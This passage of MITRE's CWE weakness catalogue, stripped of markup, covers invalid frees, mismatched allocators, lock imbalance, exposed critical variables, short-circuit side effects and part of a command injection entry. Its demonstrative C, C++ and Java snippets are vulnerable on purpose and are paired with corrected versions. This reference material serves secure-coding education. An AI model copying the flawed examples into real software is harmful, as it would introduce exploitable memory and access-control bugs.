if (**ap != '\0')if (++ap >= &argv[10])break; + + + + /.../free(ap[4]); + + Since strsep is not allocating any new memory, freeing an element in the middle of the array is equivalent to free a pointer in the middle of inputstring. + + + Consider the following code in the context of a parsing application to extract commands out of user data. The intent is to parse each command and add it to a queue of commands to be executed, discarding each malformed entry. + + + + //hardcode input length for simplicity + char* input = (char*) malloc(40*sizeof(char));char *tok;char* sep = " \t"; + get_user_input( input ); + + /* The following loop will parse and process each token in the input string */ + + tok = strtok( input, sep);while( NULL != tok ){ + if( isMalformed( tok ) ){ + + + /* ignore and discard bad data */ + free( tok ); + }else{add_to_command_queue( tok );}tok = strtok( NULL, sep)); + } + + While the above code attempts to free memory associated with bad commands, since the memory was all allocated in one chunk, it must all be freed together. + One way to fix this problem would be to copy the commands into a new memory location before placing them in the queue. Then, after all commands have been processed, the memory can safely be freed. + + + + //hardcode input length for simplicity + char* input = (char*) malloc(40*sizeof(char));char *tok, *command;char* sep = " \t"; + get_user_input( input ); + + /* The following loop will parse and process each token in the input string */ + + tok = strtok( input, sep);while( NULL != tok ){ + if( !isMalformed( command ) ){ + + + /* copy and enqueue good data */ + command = (char*) malloc( (strlen(tok) + 1) * sizeof(char) );strcpy( command, tok );add_to_command_queue( command ); + }tok = strtok( NULL, sep)); + } + free( input ) + + + + + + CVE-2019-11930 + function "internally calls 'calloc' and returns a pointer at an index... inside the allocated buffer. This led to freeing invalid memory." + https://www.cve.org/CVERecord?id=CVE-2019-11930 + + + + Memory + + + + SFP12 + Faulty Memory Release + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Currently, CWE-763 is the parent, however it may be desirable to have an intermediate parent which is not function-specific, similar to how CWE-762 is an intermediate parent between CWE-763 and CWE-590. + + + + CWE Content Team + MITRE + 2009-05-08 + 1.4 + 2009-05-27 + + + CWE Content Team + MITRE + 2010-09-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-02-18 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product attempts to return a memory resource to the system, but it calls a release function that is not compatible with the function that was originally used to allocate that resource. + + This weakness can be generally described as mismatching memory management routines, such as: + + The memory was allocated on the stack (automatically), but it was deallocated using the memory management routine free() (CWE-590), which is intended for explicitly allocated heap memory. + The memory was allocated explicitly using one set of memory management functions, and deallocated using a different set. For example, memory might be allocated with malloc() in C++ instead of the new operator, and then deallocated with the delete operator. + + When the memory management functions are mismatched, the consequences may be as severe as code execution, memory corruption, or program crash. Consequences and ease of exploit will vary depending on the implementation of the routines and the object being managed. + + + + + + + + + + + + Implementation + + + Low + + + Integrity + Availability + Confidentiality + Modify Memory + DoS: Crash, Exit, or Restart + Execute Unauthorized Code or Commands + + + + + Implementation + Only call matching memory management functions. Do not mix and match routines. For example, when you allocate a buffer with malloc(), dispose of the original pointer with free(). + + + Implementation + Libraries or Frameworks + + Choose a language or tool that provides automatic memory management, or makes manual memory management less error-prone. + For example, glibc in Linux provides protection against free of invalid pointers. + When using Xcode to target OS X or iOS, enable automatic reference counting (ARC) [REF-391]. + To help correctly and consistently manage memory when programming in C++, consider using a smart pointer class such as std::auto_ptr (defined by ISO/IEC ISO/IEC 14882:2003), std::shared_ptr and std::unique_ptr (specified by an upcoming revision of the C++ standard, informally referred to as C++ 1x), or equivalent solutions such as Boost. + + + + Architecture and Design + Libraries or Frameworks + + Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + For example, glibc in Linux provides protection against free of invalid pointers. + + + + Architecture and Design + Use a language that provides abstractions for memory allocation and deallocation. + + + Testing + Use a tool that dynamically detects memory management problems, such as valgrind. + + + + + This example allocates a BarObj object using the new operator in C++, however, the programmer then deallocates the object using free(), which may lead to unexpected behavior. + + void foo(){ + BarObj *ptr = new BarObj() + /* do some work with ptr here */ + + ... + free(ptr); + } + + Instead, the programmer should have either created the object with one of the malloc family functions, or else deleted the object with the delete operator. + + void foo(){ + BarObj *ptr = new BarObj() + /* do some work with ptr here */ + + ... + delete ptr; + } + + + + In this example, the program does not use matching functions such as malloc/free, new/delete, and new[]/delete[] to allocate/deallocate the resource. + + class A {void foo();};void A::foo(){int *ptr;ptr = (int*)malloc(sizeof(int));delete ptr;} + + + + In this example, the program calls the delete[] function on non-heap memory. + + class A{void foo(bool);};void A::foo(bool heap) {int localArray[2] = {11,22};int *p = localArray;if (heap){p = new int[2];}delete[] p;} + + + + + Memory + + + + WIN30-C + Properly pair allocation and deallocation functions + Exact + + + SFP12 + Faulty Memory Release + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + This weakness is possible in any programming language that allows manual management of memory. + + + + + CWE Content Team + MITRE + 2009-05-08 + 1.4 + 2009-05-27 + + + CWE Content Team + MITRE + 2009-12-28 + updated Applicable_Platforms, Likelihood_of_Exploit + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-02-18 + updated Demonstrative_Examples, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, References, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Martin Sebor + Cisco Systems, Inc. + 2010-04-30 + Provided improvement to existing Mitigation + + + + + The product attempts to return a memory resource to the system, but it calls the wrong release function or calls the appropriate release function incorrectly. + + This weakness can take several forms, such as: + + The memory was allocated, explicitly or implicitly, via one memory management method and deallocated using a different, non-compatible function (CWE-762). + The function calls or memory management routines chosen are appropriate, however they are used incorrectly, such as in CWE-761. + + + + + + + + + + Implementation + + + + + Integrity + Availability + Confidentiality + Modify Memory + DoS: Crash, Exit, or Restart + Execute Unauthorized Code or Commands + This weakness may result in the corruption of memory, and perhaps instructions, possibly leading to a crash. If the corrupted memory can be effectively controlled, it may be possible to execute arbitrary code. + + + + + Fuzzing + Fuzz testing (fuzzing) is a powerful technique for generating large numbers of diverse inputs - either randomly or algorithmically - and dynamically invoking the code with those inputs. Even with random inputs, it is often capable of generating unexpected results such as crashes, memory corruption, or resource consumption. Fuzzing effectively produces repeatable test cases that clearly indicate bugs, which helps developers to diagnose the issues. + High + + + + + Implementation + Only call matching memory management functions. Do not mix and match routines. For example, when you allocate a buffer with malloc(), dispose of the original pointer with free(). + + + Implementation + When programming in C++, consider using smart pointers provided by the boost library to help correctly and consistently manage memory. + + + Architecture and Design + Libraries or Frameworks + + Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + For example, glibc in Linux provides protection against free of invalid pointers. + + + + Architecture and Design + Use a language that provides abstractions for memory allocation and deallocation. + + + Testing + Use a tool that dynamically detects memory management problems, such as valgrind. + + + + + This code attempts to tokenize a string and place it into an array using the strsep function, which inserts a \0 byte in place of whitespace or a tab character. After finishing the loop, each string in the AP array points to a location within the input string. + + char **ap, *argv[10], *inputstring;for (ap = argv; (*ap = strsep(&inputstring, " \t")) != NULL;) + if (**ap != '\0')if (++ap >= &argv[10])break; + + + + /.../free(ap[4]); + + Since strsep is not allocating any new memory, freeing an element in the middle of the array is equivalent to free a pointer in the middle of inputstring. + + + This example allocates a BarObj object using the new operator in C++, however, the programmer then deallocates the object using free(), which may lead to unexpected behavior. + + void foo(){ + BarObj *ptr = new BarObj() + /* do some work with ptr here */ + + ... + free(ptr); + } + + Instead, the programmer should have either created the object with one of the malloc family functions, or else deleted the object with the delete operator. + + void foo(){ + BarObj *ptr = new BarObj() + /* do some work with ptr here */ + + ... + delete ptr; + } + + + + In this example, the programmer dynamically allocates a buffer to hold a string and then searches for a specific character. After completing the search, the programmer attempts to release the allocated memory and return SUCCESS or FAILURE to the caller. Note: for simplification, this example uses a hard-coded "Search Me!" string and a constant string length of 20. + + #define SUCCESS (1)#define FAILURE (0) + int contains_char(char c){ + char *str;str = (char*)malloc(20*sizeof(char));strcpy(str, "Search Me!");while( *str != NULL){ + if( *str == c ){ + + + /* matched char, free string and return success */ + free(str);return SUCCESS; + } + /* didn't match yet, increment pointer and try next char */ + + str = str + 1; + } + /* we did not match the char in the string, free mem and return failure */ + + free(str);return FAILURE; + } + + However, if the character is not at the beginning of the string, or if it is not in the string at all, then the pointer will not be at the start of the buffer when the programmer frees it. + Instead of freeing the pointer in the middle of the buffer, the programmer can use an indexing pointer to step through the memory or abstract the memory calculations by using array indexing. + + #define SUCCESS (1)#define FAILURE (0) + int cointains_char(char c){ + char *str;int i = 0;str = (char*)malloc(20*sizeof(char));strcpy(str, "Search Me!");while( i < strlen(str) ){ + if( str[i] == c ){ + + + /* matched char, free string and return success */ + free(str);return SUCCESS; + } + /* didn't match yet, increment pointer and try next char */ + + i = i + 1; + } + /* we did not match the char in the string, free mem and return failure */ + + free(str);return FAILURE; + } + + + + Consider the following code in the context of a parsing application to extract commands out of user data. The intent is to parse each command and add it to a queue of commands to be executed, discarding each malformed entry. + + + + //hardcode input length for simplicity + char* input = (char*) malloc(40*sizeof(char));char *tok;char* sep = " \t"; + get_user_input( input ); + + /* The following loop will parse and process each token in the input string */ + + tok = strtok( input, sep);while( NULL != tok ){ + if( isMalformed( tok ) ){ + + + /* ignore and discard bad data */ + free( tok ); + }else{add_to_command_queue( tok );}tok = strtok( NULL, sep)); + } + + While the above code attempts to free memory associated with bad commands, since the memory was all allocated in one chunk, it must all be freed together. + One way to fix this problem would be to copy the commands into a new memory location before placing them in the queue. Then, after all commands have been processed, the memory can safely be freed. + + + + //hardcode input length for simplicity + char* input = (char*) malloc(40*sizeof(char));char *tok, *command;char* sep = " \t"; + get_user_input( input ); + + /* The following loop will parse and process each token in the input string */ + + tok = strtok( input, sep);while( NULL != tok ){ + if( !isMalformed( command ) ){ + + + /* copy and enqueue good data */ + command = (char*) malloc( (strlen(tok) + 1) * sizeof(char) );strcpy( command, tok );add_to_command_queue( command ); + }tok = strtok( NULL, sep)); + } + free( input ) + + + + + Memory + + + + SFP12 + Faulty Memory Release + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + The view-1000 subtree that is associated with this weakness needs additional work. Several entries will likely be created in this branch. Currently the focus is on free() of memory, but delete and other related release routines may require the creation of intermediate entries that are not specific to a particular function. In addition, the role of other types of invalid pointers, such as an expired pointer, i.e. CWE-415 Double Free and release of uninitialized pointers, related to CWE-457. + + + + CWE Content Team + MITRE + 2009-05-08 + 1.4 + 2009-05-27 + + + CWE Content Team + MITRE + 2010-06-21 + updated Description + + + CWE Content Team + MITRE + 2010-09-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-02-18 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product locks a critical resource more times than intended, leading to an unexpected state in the system. + When a product is operating in a concurrent environment and repeatedly locks a critical resource, the consequences will vary based on the type of lock, the lock's implementation, and the resource being protected. In some situations such as with semaphores, the resources are pooled and extra locking calls will reduce the size of the total available pool, possibly leading to degraded performance or a denial of service. If this can be triggered by an attacker, it will be similar to an unrestricted lock (CWE-412). In the context of a binary lock, it is likely that any duplicate locking attempts will never succeed since the lock is already held and progress may not be possible. + + + + + + + + + Implementation + + + + + Availability + Integrity + DoS: Resource Consumption (CPU) + DoS: Crash, Exit, or Restart + Unexpected State + + + + + Implementation + When locking and unlocking a resource, try to be sure that all control paths through the code in which the resource is locked one or more times correspond to exactly as many unlocks. If the software acquires a lock and then determines it is not able to perform its intended behavior, be sure to release the lock(s) before waiting for conditions to improve. Reacquire the lock(s) before trying again. + + + + + SFP21 + Multiple locks/unlocks + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + An alternate way to think about this weakness is as an imbalance between the number of locks / unlocks in the control flow. Over the course of execution, if each lock call is not followed by a subsequent call to unlock in a reasonable amount of time, then system performance may be degraded or at least operating at less than peak levels if there is competition for the locks. This entry may need to be modified to reflect these concepts in the future. + + + + CWE Content Team + MITRE + 2009-03-03 + 1.4 + 2009-05-27 + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Type + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product unlocks a critical resource more times than intended, leading to an unexpected state in the system. + When the product is operating in a concurrent environment and repeatedly unlocks a critical resource, the consequences will vary based on the type of lock, the lock's implementation, and the resource being protected. In some situations such as with semaphores, the resources are pooled and extra calls to unlock will increase the count for the number of available resources, likely resulting in a crash or unpredictable behavior when the system nears capacity. + + + + + + + Implementation + + + + + Availability + Integrity + DoS: Crash, Exit, or Restart + Modify Memory + Unexpected State + + + + + Implementation + When locking and unlocking a resource, try to be sure that all control paths through the code in which the resource is locked one or more times correspond to exactly as many unlocks. If the product acquires a lock and then determines it is not able to perform its intended behavior, be sure to release the lock(s) before waiting for conditions to improve. Reacquire the lock(s) before trying again. + + + + + CVE-2009-0935 + Attacker provides invalid address to a memory-reading function, causing a mutex to be unlocked twice + https://www.cve.org/CVERecord?id=CVE-2009-0935 + + + + + SFP21 + Multiple locks/unlocks + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + An alternate way to think about this weakness is as an imbalance between the number of locks / unlocks in the control flow. Over the course of execution, if each lock call is not followed by a subsequent call to unlock in a reasonable amount of time, then system performance may be degraded or at least operating at less than peak levels if there is competition for the locks. This entry may need to be modified to reflect these concepts in the future. + + + + CWE Content Team + MITRE + 2009-03-03 + 1.4 + 2009-05-27 + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product declares a critical variable, field, or member to be public when intended security policy requires it to be private. + This issue makes it more difficult to maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + + Primary + + + Indirect + + + + + + + + + + Implementation + + + + + Integrity + Confidentiality + Read Application Data + Modify Application Data + Making a critical variable public allows anyone with access to the object in which the variable is contained to alter or read the value. + + + Other + Reduce Maintainability + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Data should be private, static, and final whenever possible. This will assure that your code is protected by instantiating early, preventing access, and preventing tampering. + + + + + The following example declares a critical variable public, making it accessible to anyone with access to the object in which it is contained. + + public: char* password; + + Instead, the critical data should be declared private. + + private: char* password; + + Even though this example declares the password to be private, there are other possible issues with this implementation, such as the possibility of recovering the password from process memory (CWE-257). + + + The following example shows a basic user account class that includes member variables for the username and password as well as a public constructor for the class and a public method to authorize access to the user account. + + #define MAX_PASSWORD_LENGTH 15#define MAX_USERNAME_LENGTH 15 + class UserAccount{ + public: + UserAccount(char *username, char *password){if ((strlen(username) > MAX_USERNAME_LENGTH) ||(strlen(password) > MAX_PASSWORD_LENGTH)) {ExitError("Invalid username or password");}strcpy(this->username, username);strcpy(this->password, password);} + + + int authorizeAccess(char *username, char *password){ + if ((strlen(username) > MAX_USERNAME_LENGTH) ||(strlen(password) > MAX_PASSWORD_LENGTH)) {ExitError("Invalid username or password");} + // if the username and password in the input parameters are equal to + + + // the username and password of this account class then authorize access + if (strcmp(this->username, username) ||strcmp(this->password, password))return 0; + + // otherwise do not authorize access + elsereturn 1; + + } + char username[MAX_USERNAME_LENGTH+1];char password[MAX_PASSWORD_LENGTH+1]; + }; + + However, the member variables username and password are declared public and therefore will allow access and changes to the member variables to anyone with access to the object. These member variables should be declared private as shown below to prevent unauthorized access and changes. + + class UserAccount{public:... + + private:char username[MAX_USERNAME_LENGTH+1];char password[MAX_PASSWORD_LENGTH+1];}; + + + + + + CVE-2010-3860 + variables declared public allows remote read of system properties such as user name and home directory. + https://www.cve.org/CVERecord?id=CVE-2010-3860 + + + + + Failure to protect stored data from modification + + + OBJ01-J + Declare data members as private and provide accessible wrapper methods + + + SFP28 + Unexpected access points + + + ASCMM-MNT-15 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2009-03-03 + 1.4 + 2009-05-27 + + + CWE Content Team + MITRE + 2009-12-28 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-12-13 + updated Observed_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Likelihood_of_Exploit, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Common_Consequences, Description, Name, References, Relationships, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + Critical Variable Declared Public + + + + The product defines a public method that reads or modifies a private variable. + If an attacker modifies the variable to contain unexpected values, this could violate assumptions from other parts of the code. Additionally, if an attacker can read the private variable, it may expose sensitive information or make it easier to launch further attacks. + + + + + + + + + + + Implementation + + + + + Integrity + Other + Modify Application Data + Other + + + + + Implementation + Use class accessor and mutator methods appropriately. Perform validation when accepting data from a public method that is intended to modify a critical private variable. Also be sure that appropriate access controls are being applied when a public method interfaces with critical data. + + + + + The following example declares a critical variable to be private, and then allows the variable to be modified by public methods. + + private: float price;public: void changePrice(float newPrice) {price = newPrice;} + + + + The following example could be used to implement a user forum where a single user (UID) can switch between multiple profiles (PID). + + public class Client {private int UID;public int PID;private String userName;public Client(String userName){PID = getDefaultProfileID();UID = mapUserNametoUID( userName );this.userName = userName;}public void setPID(int ID) {UID = ID;}} + + The programmer implemented setPID with the intention of modifying the PID variable, but due to a typo. accidentally specified the critical variable UID instead. If the program allows profile IDs to be between 1 and 10, but a UID of 1 means the user is treated as an admin, then a user could gain administrative privileges as a result of this typo. + + + + + Failure to protect stored data from modification + + + SFP23 + Exposed Data + + + OOP31-PL + Do not access private variables or subroutines in other packages + Imprecise + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry is closely associated with access control for public methods. If the public methods are restricted with proper access controls, then the information in the private variable will not be exposed to unexpected parties. There may be chaining or composite relationships between improper access controls and this weakness. + + + + CWE Content Team + MITRE + 2009-03-03 + 1.4 + 2009-05-27 + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Likelihood_of_Exploit, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product contains a conditional statement with multiple logical expressions in which one of the non-leading expressions may produce side effects. This may lead to an unexpected state in the program after the execution of the conditional, because short-circuiting logic may prevent the side effects from occurring. + + Usage of short circuit evaluation, though well-defined in the C standard, may alter control flow in a way that introduces logic errors that are difficult to detect, possibly causing errors later during the product's execution. If an attacker can discover such an inconsistency, it may be exploitable to gain arbitrary control over a system. + If the first condition of an "or" statement is assumed to be true under normal circumstances, or if the first condition of an "and" statement is assumed to be false, then any subsequent conditional may contain its own logic errors that are not detected during code review or testing. + Finally, the usage of short circuit evaluation may decrease the maintainability of the code. + + + + + + + Implementation + + + Low + + + Confidentiality + Integrity + Availability + Widely varied consequences are possible if an attacker is aware of an unexpected state in the product after a conditional. It may lead to information exposure, a system crash, or even complete attacker control of the system. + + + + + Implementation + Minimizing the number of statements in a conditional that produce side effects will help to prevent the likelihood of short circuit evaluation to alter control flow in an unexpected way. + + + + + The following function attempts to take a size value from a user and allocate an array of that size (we ignore bounds checking for simplicity). The function tries to initialize each spot with the value of its index, that is, A[len-1] = len - 1; A[len-2] = len - 2; ... A[1] = 1; A[0] = 0; However, since the programmer uses the prefix decrement operator, when the conditional is evaluated with i == 1, the decrement will result in a 0 value for the first part of the predicate, causing the second portion to be bypassed via short-circuit evaluation. This means we cannot be sure of what value will be in A[0] when we return the array to the user. + + #define PRIV_ADMIN 0#define PRIV_REGULAR 1typedef struct{int privileges;int id;} user_t;user_t *Add_Regular_Users(int num_users){user_t* users = (user_t*)calloc(num_users, sizeof(user_t));int i = num_users;while( --i && (users[i].privileges = PRIV_REGULAR) ){users[i].id = i;}return users;}int main(){user_t* test;int i;test = Add_Regular_Users(25);for(i = 0; i < 25; i++) printf("user %d has privilege level %d\n", test[i].id, test[i].privileges);} + + When compiled and run, the above code will output a privilege level of 1, or PRIV_REGULAR for every user but the user with id 0 since the prefix increment operator used in the if statement will reach zero and short circuit before setting the 0th user's privilege level. Since we used calloc, this privilege will be set to 0, or PRIV_ADMIN. + + + + + Failure to protect stored data from modification + + + SFP1 + Glitch in computation + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2009-03-03 + 1.4 + 2009-05-27 + + + CWE Content Team + MITRE + 2010-09-27 + updated Description + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Likelihood_of_Exploit, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Common_Consequences, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This entry has been deprecated because it was a duplicate of CWE-774. All content has been transferred to CWE-774. + + Prohibited + This CWE has been deprecated. + See description and name for possible suggestions of other CWEs to consider. + + + + + + + CWE Content Team + MITRE + 2009-05-08 + 1.4 + 2009-05-27 + + + CWE Content Team + MITRE + 2010-04-05 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Description + + + CWE Content Team + MITRE + 2010-12-13 + updated Description + + + CWE Content Team + MITRE + 2013-02-21 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Alternate_Terms, Description, Likelihood_of_Exploit, Name, Relationships, Type + + + CWE Content Team + MITRE + 2019-01-03 + updated Alternate_Terms, Description, Likelihood_of_Exploit, Name, Potential_Mitigations, References, Relationships, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + File Descriptor Exhaustion + Uncontrolled File Descriptor Consumption + + + + The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. + + Command injection vulnerabilities typically occur when: + + 1. Data enters the application from an untrusted source. + 2. The data is part of a string that is executed as a command by the application. + 3. By executing the command, the application gives an attacker a privilege or capability that the attacker would not otherwise have. + + Many protocols and products have their own custom command language. While OS or shell command strings are frequently discovered and targeted, developers may not realize that these other command languages might also be vulnerable to attacks. + Command injection is a common problem with wrapper programs. + + + + + + + + Primary + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + High + + + Integrity + Confidentiality + Availability + Execute Unauthorized Code or Commands + If a malicious user injects a character (such as a semi-colon) that delimits the end of one command and the beginning of another, it may be possible to then insert an entirely new and unrelated command that was not intended to be executed. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + If at all possible, use library calls rather than external processes to recreate the desired functionality. + + + Implementation + If possible, ensure that all external commands called from the program are statically created. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers 